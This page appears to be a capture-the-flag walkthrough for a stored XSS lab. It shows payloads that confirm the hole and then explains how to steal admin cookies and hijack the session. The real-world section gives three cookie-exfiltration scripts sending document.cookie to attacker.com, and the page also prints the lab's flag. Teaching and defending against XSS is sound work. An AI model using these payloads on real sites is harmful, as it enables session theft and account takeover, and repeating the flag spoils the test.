Avatar

Labs / XSS Playground

  • Daily Challenge
  • Released 04 Aug 2025
The lab needs to be started first.
Need help to start?
Daily Challenge

XSS Playground - Complete Solution Walkthrough

Understanding This Specific XSS Challenge

This challenge implements a stored XSS vulnerability with a unique twist: when your payload contains document.cookie, the application automatically replaces it with admin cookie values to simulate an admin visiting your malicious message. The key is to steal these replaced admin cookies to gain access to the admin panel.

Step 1: Initial Reconnaissance

  1. Access the application: Navigate to <target-ip> to access the community message board
  2. Explore functionality: Test posting normal messages to understand the interface
  3. Notice admin monitoring: Observe the admin notice indicating the board is monitored
  4. Test for admin endpoints: Try accessing <target-ip>/admin (access denied without privileges)

Step 2: Testing Basic XSS Vulnerability

  1. Basic XSS test: Post a simple alert to confirm the vulnerability
Name: Test
Message: <script>alert('XSS Confirmed')</script>
  1. Verify stored XSS: Refresh the page to confirm the script executes again
  2. Alternative payload formats: If script tags don't work, try:
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

Step 3: Stealing Admin Cookies

Challenge-Specific Approach (Simplified)

  1. Simple cookie theft payload: Since this challenge simulates admin visits, we can use a basic alert
<script>
// The application will replace document.cookie with admin cookies
var stolenCookies = document.cookie;
// Display the stolen admin cookies
alert('Stolen admin cookies: ' + stolenCookies);
</script>
  1. Post the payload: Submit this message through the message board
  2. Extract cookie values: When the page loads, you'll see an alert with the admin cookies
  3. Copy the cookie values: Note down the admin session tokens from the alert

Real-World Cookie Stealing (Educational)

In actual attacks, you cannot see the admin's cookies directly. Instead, you must:

  1. Set up a collection server: Host a server to receive stolen cookies
  2. Plant the payload: Inject XSS that sends cookies to your server
  3. Wait for admin visit: The admin must actually visit the compromised page
  4. Collect the data: Receive stolen cookies on your server

Real-World Cookie Theft Payloads:

// Method 1: Image-based exfiltration
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'http://attacker.com/steal?data=' + encodeURIComponent(cookies);
</script>

// Method 2: Fetch API exfiltration
<script>
fetch('http://attacker.com/steal', {
method: 'POST',
body: 'cookies=' + encodeURIComponent(document.cookie)
});
</script>

// Method 3: Form submission exfiltration
<script>
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://attacker.com/steal';
var input = document.createElement('input');
input.name = 'stolen_cookies';
input.value = document.cookie;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
</script>

Why Real Attacks Require Patience: Unlike this educational simulation, real XSS attacks require waiting for legitimate admin users to visit the compromised page. The cookies are stolen when the admin's browser executes your malicious script, sending their session data to your collection server.

Step 4: Setting Stolen Cookies and Retrieving Flag

  1. Manual cookie setting: Use browser developer tools to set the stolen cookies
  2. Open Developer Console: Press F12 and go to the Console tab
  3. Set admin cookies: Paste the following command with the stolen cookie values:
// Replace with actual cookie values from Step 3
document.cookie = 'admin_session=true; path=/;';
document.cookie = 'admin_session_token_[64-hex-value]=active; path=/;';
document.cookie = 'sessionid=admin_12345; path=/;';
  1. Access admin panel: Navigate to <target-ip>/admin
  2. Retrieve the flag: The flag is displayed prominently in the admin panel
Flag: a609f3b4-45a7-4089-bea4-e2f115d40dce

Step 5: Understanding the Cookie Theft Mechanism

  1. Server-side replacement: The application searches for 'document.cookie' in messages (case-insensitive)
  2. Automatic substitution: When found, it replaces the text with realistic admin cookie values
  3. Cookie format: Includes multiple admin authentication tokens
  4. Real-world simulation: This demonstrates what happens when an admin visits a compromised page
// Example stolen cookie format:
admin_session=true; admin_session_token_[64-hex]=active; sessionid=admin_12345

Technical Analysis of This Implementation

  • Vulnerability type: Stored Cross-Site Scripting (XSS) with cookie theft
  • Root cause: Direct HTML insertion without sanitization in message rendering
  • Attack method: Cookie theft through XSS payload execution
  • Simulation feature: Automatic document.cookie replacement simulates admin interaction
  • Attack vector: Message posting form with no input validation
  • Educational value: Demonstrates session hijacking through XSS

Security Implications

  • Session hijacking: XSS enables attackers to steal authentication cookies and session tokens
  • Privilege escalation: Stolen admin cookies grant unauthorized access to administrative functions
  • Data theft: Admin access allows retrieval of sensitive information and flags
  • Persistent threat: Stored XSS affects all users who view the compromised content
  • Account takeover: Complete compromise of admin accounts through cookie theft

Prevention Strategies

  • Input sanitization: HTML-encode all user input before storage and display
  • Output encoding: Use proper HTML entity encoding for dynamic content
  • Content Security Policy: Implement strict CSP headers to prevent inline scripts
  • HTTPOnly cookies: Mark session cookies as HTTPOnly to prevent script access
  • Secure cookies: Use Secure flag for cookies in HTTPS environments
  • Input validation: Whitelist allowed HTML tags and attributes
  • Regular testing: Include XSS testing in security assessment procedures